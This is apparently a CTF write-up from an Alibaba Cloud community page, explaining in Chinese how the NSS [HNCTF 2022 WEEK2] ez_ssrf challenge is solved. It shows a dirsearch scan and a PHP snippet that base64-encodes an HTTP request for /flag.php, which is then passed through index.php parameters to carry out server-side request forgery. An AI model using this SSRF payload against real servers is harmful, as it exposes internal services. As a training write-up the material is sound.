备案控制台

开发者社区云计算文章正文

NSS [HNCTF 2022 WEEK2]ez_ssrf

2024-08-14 50

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： NSS [HNCTF 2022 WEEK2]ez_ssrf

NSS [HNCTF 2022 WEEK2]ez_ssrf

先拿dirsearch扫一下。

访问/flag.php

访问/index.php

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data，host为127.0.0.1，port为80

传参：/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

Jay17

目录

相关文章

游客qeoynko2nmbgk

|

4月前

|

安全 Windows

遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1

遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1

游客qeoynko2nmbgk

24 2 2

游客qeoynko2nmbgk

|

4月前

|

安全 Shell

遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1

遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1

游客qeoynko2nmbgk

53 2 2

游客qeoynko2nmbgk

|

4月前

|

监控安全数据安全/隐私保护

遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1

遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1

游客qeoynko2nmbgk

24 2 2

游客qeoynko2nmbgk

|

4月前

|

安全网络协议

刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码

刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码

游客qeoynko2nmbgk

21 3 3

游客qeoynko2nmbgk

|

4月前

|

安全 Windows

抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马

抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马

游客qeoynko2nmbgk

30 0 0

游客qeoynko2nmbgk

|

4月前

遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1

遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1

游客qeoynko2nmbgk

23 0 0

游客qeoynko2nmbgk

|

4月前

|

安全

遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1

遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1

游客qeoynko2nmbgk

48 0 0

游客qeoynko2nmbgk

|

4月前

|

安全

遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马

遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马

游客qeoynko2nmbgk

34 0 0

游客qeoynko2nmbgk

|

4月前

|

网络安全

遭遇Win32.Loader.c,Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.AskTao等1

遭遇Win32.Loader.c,Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.AskTao等1

游客qeoynko2nmbgk

42 0 0

丸卜

|

5月前

NSSCTF[NISACTF 2022]sign-ezc++

NSSCTF[NISACTF 2022]sign-ezc++

丸卜

50 0 0

热门文章

最新文章

【实战】锐捷AC+AP配置WLAN基本服务系列

Tomcat 7.0 64位免安装解压版安装及配置

丰富、连接、待集成—MaxCompute 生态再出发

securecrt克隆会话与sshd 的 MaxSessions

svelte教程（3）props

XP高仿win7宽栏风格主题

Silverlight实用窍门系列：62.Silverlight中的Action动作TargetedTriggerAction、TriggerAction

谈谈ILDasm的功能限制与解除

UIWebView体系结构（八）各个Client综述

欢迎使用Dataphin，开启您的智能数据治理之旅！

《模型压缩与量化：提升性能与降低成本的关键策略》

《预训练语言模型：开启智能时代的大门》

《词嵌入技术：开启文本理解的大门》

《探索人工智能的多元学派：符号主义、连接主义与行为主义》

《解密奖励函数：引导智能体走向最优策略》

预编译为什么能防止SQL注入?

探索Wiki：开源知识管理平台及其私有化部署

深入解析 Hologres Table Group 与 Shard Count

1.1 学习Python操作Excel的必要性

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

阿里云无影云电脑免费试用，最长可试用3个月